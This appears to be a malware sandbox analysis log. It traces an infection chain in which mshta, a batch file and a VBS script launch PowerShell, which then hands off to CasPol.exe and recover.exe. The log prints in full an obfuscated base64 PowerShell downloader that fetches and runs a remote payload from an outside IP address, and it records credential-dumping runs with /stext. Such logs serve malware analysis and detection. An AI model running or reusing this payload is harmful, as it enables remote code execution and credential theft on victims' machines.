                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\nonordinary.vbs"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreakJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
